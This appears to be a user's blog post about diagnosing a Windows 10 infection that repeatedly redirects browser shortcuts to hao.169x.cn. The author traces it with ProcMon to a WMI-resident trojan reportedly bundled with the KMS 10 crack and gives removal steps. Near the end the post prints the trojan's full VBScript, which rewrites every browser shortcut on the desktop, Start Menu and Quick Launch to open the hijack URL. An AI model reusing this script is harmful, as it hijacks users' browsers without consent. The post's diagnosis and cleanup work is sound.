I am running windows 10 and i am bothered by this problem. i usualy have chrome shortcut in my QuickLaunch. but sometimes its become launching “hao.169x.cn” shortcut..
i mean its when i create shortcut, its target is –
but after some minuts/hoursd, its target get changes and it now targeting –
Some Experiments to Find Changer Process –
- first i searched v=108 containing files in C:\ Drive with UltraFindFiles Lite.But it reveals nothing. i mean nothing found in any files accept some ADWCleaners log files.
so this method failed.
2. second, i tried to monitor changes in the shortcut file. so , with SystemInternal’s ProcMon, i captured events for 2 Hours. to find desired events among 2,77,45,606 events,
i noticed shortcut’s “Date Modified” property. it shows “4/1/2017 6:13PM”
so first i filtered file changing events by Path as follows-
if path is C:\Users\ManojBhakarPCM\Desktop\chrome.lnk then include
then checked Menu-Tool–> File Summary , and i saw there only two File Write Events Total.
But i dont know how to filter write events. so i added one more filter for highlighting as follows-
if Details Contains Write then include
this actually reduced the events to look for. there were still many events- those who had details of QueryBasicInformationFile event. they had events of LastWrite containing String .
But i looked for specific time – 6:13 PM. and i got soon.
Two Processes have Opened the shortcut file for Writing.
and as far as i understood, scrcons.exe Rewrite my chrome.lnk shortcut file.
but i checked sfc, none of windows system files are tempered., i scanned my whole computer with Zemana Antivirus, ADWCleaner . they only removes Shortcuts, and some Registry Entries , But not the Creater.. i am still infected.
oh yes, with Zemana Antivirus, i always detect four instance of hao.169x.cn, 2 as shortcuts and other 2 are registry entries. which is –
sub key number 108 and 118 has the entries. –
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
New Tests –
Sending scrcons.exe to virus total via virus total uploader-
its Safe.. Nothing found. 😦
this scrcons.exe is in wbem folder. and i noticed suspicius activity of WmiPrvSE.exe which is also located in same folder.
help if anybody know about it. i am still infected.
UPDATE: FOUND the Cause And Solution.
yes. its a trojan. it comes with KMS 10 .(KMS is All Microsoft Software Cracker) .
this trojan is a VBScript which resides in WMI. it always run either after a fixed interval of time or windows logon.(Restarting or waking up from sleep).
in WMI, event name is VBScriptKids_consumer .. you can search this word on net to get other blogs about it.
- install WMI Event Viewer.
- connect to namespace root\CIMv2
- within this namespace, delete all vbscriptkids named entry from all – Timers, Consumers, Filters. and you are done.
the Script is VBScript inside WMI and i Reformatted it to copy paste here.
On Error Resume Next Const link = "http://hao.169x.cn/?v=108" Const link360 = "http://hao.169x.cn/?v=108&s=3" browsers = "114ie.exe,115chrome.exe,1616browser.exe,2345chrome.exe,2345explorer.exe,360se.exe,360chrome.exe,,avant.exe,baidubrowser.exe,chgreenbrowser.exe,chrome.exe,firefox.exe,greenbrowser.exe,iexplore.exe,juzi.exe,kbrowser.exe,launcher.exe,liebao.exe,maxthon.exe,niuniubrowser.exe,qqbrowser.exe,sogouexplorer.exe,srie.exe,tango3.exe,theworld.exe,tiantian.exe,twchrome.exe,ucbrowser.exe,webgamegt.exe,xbrowser.exe,xttbrowser.exe,yidian.exe,yyexplorer.exe" lnkpaths = "C:\Users\Public\Desktop,C:\ProgramData\Microsoft\Windows\Start Menu\Programs,C:\Users\ManojBhakarPCM\Desktop,C:\Users\ManojBhakarPCM\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch,C:\Users\ManojBhakarPCM\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu,C:\Users\ManojBhakarPCM\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar,C:\Users\ManojBhakarPCM\AppData\Roaming\Microsoft\Windows\Start Menu\Programs" browsersArr = split(browsers,",") Set oDic = CreateObject("scripting.dictionary") For Each browser In browsersArr oDic.Add LCase(browser), browser Next lnkpathsArr = split(lnkpaths,",") Set oFolders = CreateObject("scripting.dictionary") For Each lnkpath In lnkpathsArr oFolders.Add lnkpath, lnkpath Next Set fso = CreateObject("Scripting.Filesystemobject") Set WshShell = CreateObject("Wscript.Shell") For Each oFolder In oFolders If fso.FolderExists(oFolder) Then For Each file In fso.GetFolder(oFolder).Files If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then Set oShellLink = WshShell.CreateShortcut(file.Path) path = oShellLink.TargetPath name = fso.GetBaseName(path) & "." & fso.GetExtensionName(path) If oDic.Exists(LCase(name)) Then If LCase(name) = LCase("360se.exe") Then oShellLink.Arguments = link360 Else oShellLink.Arguments = link End If If file.Attributes And 1 Then file.Attributes = file.Attributes - 1 End If oShellLink.Save End If End If Next End If Next
which simply reads- modify shortcuts of all kind of browsers which may resides in QuickLaunch, Desktop, StartMenu .
Now i have deleted everything related to this in WMI and reCreated all shortcuts. and waiting if problem comes again.